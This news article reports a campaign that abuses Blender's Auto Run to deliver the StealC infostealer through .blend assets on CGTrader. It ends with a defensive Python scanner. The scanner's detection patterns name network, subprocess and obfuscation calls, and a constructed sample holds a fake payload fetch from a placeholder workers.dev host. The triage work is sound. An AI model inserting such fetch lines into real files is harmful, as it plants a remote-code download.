- Russian hackers exploit Blender’s Auto Run feature to deliver StealC infostealer via .blend files
- Malware is deployed through CGTrader assets and pulls payloads from Cloudflare Workers domains
- StealC variant targets browsers, crypto wallets, chat apps and VPN clients undetected
Experts have found that Russian hackers are exploiting a handy but risky Blender feature to deliver infostealer malware.
Cybersecurity researchers at Morphisec observed the attacks in the wild and urged designers and other professionals to be vigilant.
Blender is a widely used open source 3D creation suite popular among artists, animators, game developers and studios for everything from modeling and rendering to visual effects. There’s also CGTrader, a marketplace where 3D artists and designers can buy, sell, and share user-generated models and assets for their projects.
Significant impact
Now, Morphisec says it saw Russia-linked cybercriminals upload .blend files with embedded Python code to CGTrader.
The code pulls a malware loader from a Cloudflare Workers domain, which in turn pulls two ZIP archives. These deploy two payloads, a StealC infostealer and an additional Python stealer, probably as a fallback.
Obviously, the Python code needs to be triggered. This is where the “handy but risky” feature comes into play. It is called Auto Run, and if it is enabled when a user opens a character rig, the script automatically loads the face controls and custom UI panels and consequently triggers the malware deployment process.
StealC is a popular infostealer that has been around for years and has been observed in several high-profile campaigns. It’s also constantly evolving, with newer versions getting better at persistence, stealth and infostealing features.
This latest variant, used in this campaign, can extract data from more than 20 browsers, more than 100 cryptocurrency wallet browser extensions, more than 15 cryptocurrency wallet apps, the majority of chat apps, as well as VPN clients.
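Because the delivery described above depends on Python text embedded in the .blend file, a downloaded asset can be triaged before it is ever opened in Blender. The following is an added example, not code from Morphisec or Blender: a heuristic byte scan of uncompressed or gzip-compressed .blend files, where the marker list, function names and sample bytes are assumptions constructed for illustration.

```python
import gzip
import re

BLEND_MAGIC = b"BLENDER"          # every .blend header starts with this
GZIP_MAGIC = b"\x1f\x8b"          # older compressed .blend files
ZSTD_MAGIC = b"\x28\xb5\x2f\xfd"  # newer compressed .blend files

# Heuristic markers (assumptions for this example): constructs a rig's UI
# script rarely needs but a script that fetches and runs a payload does.
SUSPICIOUS = {
    "network": re.compile(rb"urllib\.request|urlopen|requests\.get|http\.client|socket\."),
    "process": re.compile(rb"subprocess|os\.system|os\.popen|powershell", re.I),
    "obfuscation": re.compile(rb"base64\.b64decode|\bexec\s*\(|\beval\s*\(|__import__"),
    "workers_domain": re.compile(rb"[\w.-]+\.workers\.dev", re.I),
}

# Constructed sample: a .blend-style header followed by a fake embedded script.
SAMPLE = (b"BLENDER-v300" + b"\x00" * 16 +
          b"import bpy\nimport urllib.request\n"
          b"urllib.request.urlopen('https://placeholder.workers.dev/x')\n")


def load_blend_bytes(raw):
    """Return the uncompressed .blend payload, or raise ValueError."""
    if raw.startswith(GZIP_MAGIC):
        raw = gzip.decompress(raw)
    elif raw.startswith(ZSTD_MAGIC):
        # zstd is not handled here; decompress with an external tool first.
        raise ValueError("zstd-compressed .blend: decompress before scanning")
    if not raw.startswith(BLEND_MAGIC):
        raise ValueError("not a .blend file")
    return raw


def triage_blend(raw):
    """Return {category: sorted matched strings} for markers found in the file."""
    data = load_blend_bytes(raw)
    hits = {}
    for name, pattern in SUSPICIOUS.items():
        found = sorted({m.group(0).decode("ascii", "replace")
                        for m in pattern.finditer(data)})
        if found:
            hits[name] = found
    return hits


if __name__ == "__main__":
    print(triage_blend(SAMPLE))
```

A hit is a reason to inspect the file's text blocks before trusting it, not proof of malware, and a clean result does not clear a file. Leaving Blender's "Auto Run Python Scripts" preference disabled keeps embedded scripts from executing when the file is opened.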
Via Bleeping Computer



